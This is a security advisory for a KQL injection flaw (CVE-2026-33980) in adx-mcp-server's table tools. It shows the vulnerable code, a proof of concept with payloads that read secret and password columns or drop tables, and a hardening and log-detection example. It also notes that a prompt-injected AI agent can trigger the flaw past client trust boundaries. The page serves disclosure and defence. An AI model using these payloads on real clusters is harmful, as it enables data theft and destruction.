
Python: EUVD-2026-16878 | CVE-2026-33980 | HIGH

Improper Neutralization of Special Elements in Data Query Logic (CWE-943)
Date: 2026-03-27
Project: https://github.com/pab1it0/adx-mcp-server
Advisory: GHSA-vphc-468g-8rfp
CVSS 3.1 base score: 8.3

CVSS Vector (source: NVD)

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: None
  • Scope: Unchanged
  • Confidentiality: High
  • Integrity: High
  • Availability: Low

Lifecycle Timeline (5 events)

  • Re-analysis Queued (cvss_changed): Apr 22, 2026 - 14:52, vuln.today
  • EUVD ID Assigned (EUVD-2026-16878): Mar 27, 2026 - 19:30, euvd
  • Analysis Generated: Mar 27, 2026 - 19:30, vuln.today
  • Patch released (patch available): Mar 27, 2026 - 19:30, nvd
  • CVE Published (HIGH 8.3): Mar 27, 2026 - 19:08, nvd

Description (source: NVD)

Summary

adx-mcp-server (<= latest, commit 48b2933) contains KQL (Kusto Query Language) injection vulnerabilities in three MCP tool handlers: get_table_schema, sample_table_data, and get_table_details. The table_name parameter is interpolated directly into KQL queries via f-strings without any validation or sanitization, allowing an attacker (or a prompt-injected AI agent) to execute arbitrary KQL queries against the Azure Data Explorer cluster.

Details

The MCP tools construct KQL queries by directly embedding the table_name parameter into query strings:

Vulnerable code (permalink):

```python
@mcp.tool(...)
async def get_table_schema(table_name: str) -> List[Dict[str, Any]]:
    client = get_kusto_client()
    query = f"{table_name} | getschema"  # <-- KQL injection
    result_set = client.execute(config.database, query)
```

```python
@mcp.tool(...)
async def sample_table_data(table_name: str, sample_size: int = 10) -> List[Dict[str, Any]]:
    client = get_kusto_client()
    query = f"{table_name} | sample {sample_size}"  # <-- KQL injection
    result_set = client.execute(config.database, query)
```

```python
@mcp.tool(...)
async def get_table_details(table_name: str) -> List[Dict[str, Any]]:
    client = get_kusto_client()
    query = f".show table {table_name} details"  # <-- KQL injection
    result_set = client.execute(config.database, query)
```

KQL allows chaining query operators with `|` and executing management commands prefixed with `.`. An attacker can inject:

  • `sensitive_table | project Secret, Password | take 100 //` to read arbitrary tables
  • Newline-separated management commands such as `.drop table important_data` via get_table_details
  • Arbitrary KQL analytics queries via any of the three tools

Note: While the server also has an execute_query tool that accepts raw KQL by design, the three vulnerable tools are presented as safe metadata-inspection tools. MCP clients may grant automatic access to "safe" tools while requiring confirmation for execute_query. The injection bypasses this trust boundary.
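The fix that removes this class of bug is to never let the caller's string reach the query as KQL syntax: accept only a bare identifier, and optionally check it against the table list the server already obtained from the cluster. The following is an added example written for this advisory; it is not code from adx-mcp-server. It assumes a conservative identifier allowlist (stricter than Kusto's own naming rules), an optional caller-supplied set of known table names, and a log-review heuristic (`looks_like_kql_injection`, `audit_tool_calls`) for spotting the payload shapes shown on this page in recorded MCP tool calls. The sample tool calls at the bottom are constructed.

```python
"""Hardened table-name handling for the three KQL-building tools.

Added example for this advisory; it is not code from adx-mcp-server.
Assumptions: a conservative identifier allowlist (stricter than Kusto's
own naming rules), an optional caller-supplied set of known table names,
and a heuristic for flagging suspicious tool-call arguments in logs.
"""
import re
from typing import Any, Dict, Iterable, List, Optional

# Conservative allowlist (assumption): letters, digits and underscores only,
# not starting with a digit. Anything outside it is refused rather than escaped.
_SAFE_IDENTIFIER = re.compile(r"^[A-Za-z_][A-Za-z0-9_]{0,1023}$")


class UnsafeTableName(ValueError):
    """Raised when a table name would not survive as a single KQL identifier."""


def validate_table_name(table_name: Any, known_tables: Optional[Iterable[str]] = None) -> str:
    """Return table_name unchanged if it is a plain identifier (and, when a
    list of known tables is supplied, one of them); otherwise raise."""
    if not isinstance(table_name, str) or not _SAFE_IDENTIFIER.match(table_name):
        raise UnsafeTableName(f"rejected table name: {table_name!r}")
    if known_tables is not None and table_name not in set(known_tables):
        raise UnsafeTableName(f"unknown table: {table_name!r}")
    return table_name


def build_schema_query(table_name: Any, known_tables: Optional[Iterable[str]] = None) -> str:
    # Same query shape as get_table_schema, but only a validated identifier goes in.
    return f"{validate_table_name(table_name, known_tables)} | getschema"


def build_sample_query(table_name: Any, sample_size: Any,
                       known_tables: Optional[Iterable[str]] = None) -> str:
    # sample_size is interpolated too, so it is range-checked as a true int
    # (bool is excluded because it is an int subclass in Python).
    if isinstance(sample_size, bool) or not isinstance(sample_size, int) \
            or not 1 <= sample_size <= 1000:
        raise ValueError(f"sample_size out of range: {sample_size!r}")
    return f"{validate_table_name(table_name, known_tables)} | sample {sample_size}"


def build_details_query(table_name: Any, known_tables: Optional[Iterable[str]] = None) -> str:
    # Management commands are the most sensitive sink: only a bare identifier is accepted.
    return f".show table {validate_table_name(table_name, known_tables)} details"


# Detection heuristic for log review: pipe operators, line breaks, statement
# separators, comment markers or a leading dot have no place in a table name.
_SUSPICIOUS = re.compile(r"[|\r\n;]|//|^\s*\.")


def looks_like_kql_injection(value: str) -> bool:
    return bool(_SUSPICIOUS.search(value))


def audit_tool_calls(calls: List[Dict[str, Any]]) -> List[str]:
    """Return the tool names of calls whose table_name argument looks injected."""
    flagged = []
    for call in calls:
        arg = call.get("arguments", {}).get("table_name", "")
        if isinstance(arg, str) and looks_like_kql_injection(arg):
            flagged.append(call["name"])
    return flagged


# Constructed sample of MCP tool calls, mirroring the argument shapes in the PoC.
SAMPLE_TOOL_CALLS: List[Dict[str, Any]] = [
    {"name": "get_table_schema",
     "arguments": {"table_name": "sensitive_data | project Secret, Password | take 100 //"}},
    {"name": "sample_table_data", "arguments": {"table_name": "Users", "sample_size": 10}},
    {"name": "get_table_details",
     "arguments": {"table_name": "users details\n.drop table critical_data"}},
]


if __name__ == "__main__":
    print(build_schema_query("Users"))
    print("flagged:", audit_tool_calls(SAMPLE_TOOL_CALLS))
    for call in SAMPLE_TOOL_CALLS:
        try:
            validate_table_name(call["arguments"]["table_name"])
        except UnsafeTableName as exc:
            print("blocked:", exc)
```

The allowlist is deliberately rejecting rather than escaping: a table name that needs KQL quoting syntax to be expressed is not something a metadata-inspection tool should accept from an untrusted agent, and refusing it keeps the "safe tool" trust boundary described in the note above intact. The `audit_tool_calls` heuristic is only for reviewing recorded calls; the validation functions are the actual control.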

PoC

```python
# PoC: KQL Injection via get_table_schema tool
# The table_name parameter is injected into: f"{table_name} | getschema"

import json

# MCP tool call that exfiltrates data from a sensitive table
tool_call = {
    "name": "get_table_schema",
    "arguments": {
        "table_name": "sensitive_data | project Secret, Password | take 100 //"
    }
}
print(json.dumps(tool_call, indent=2))
# Resulting KQL: "sensitive_data | project Secret, Password | take 100 // | getschema"
# The // comments out "| getschema", executing an arbitrary data query instead

# Destructive example via get_table_details:
tool_call_destructive = {
    "name": "get_table_details",
    "arguments": {
        "table_name": "users details\n.drop table critical_data"
    }
}
# Resulting KQL:
#   .show table users details
#   .drop table critical_data details
```

Analysis (AI-generated)

KQL injection in adx-mcp-server Python package allows authenticated attackers to execute arbitrary Kusto queries against Azure Data Explorer clusters. Three MCP tool handlers (get_table_schema, sample_table_data, get_table_details) unsafely interpolate the table_name parameter into query strings via f-strings, enabling data exfiltration from arbitrary tables, execution of management commands, and potential table drops. …


Remediation (AI-generated)

Within 24 hours: Identify all systems running adx-mcp-server and document current versions (check for versions ≤ commit 48b2933). Within 7 days: Apply vendor patch (commit 0abe0ee or later) to all affected systems; validate patch deployment in a test environment first. …
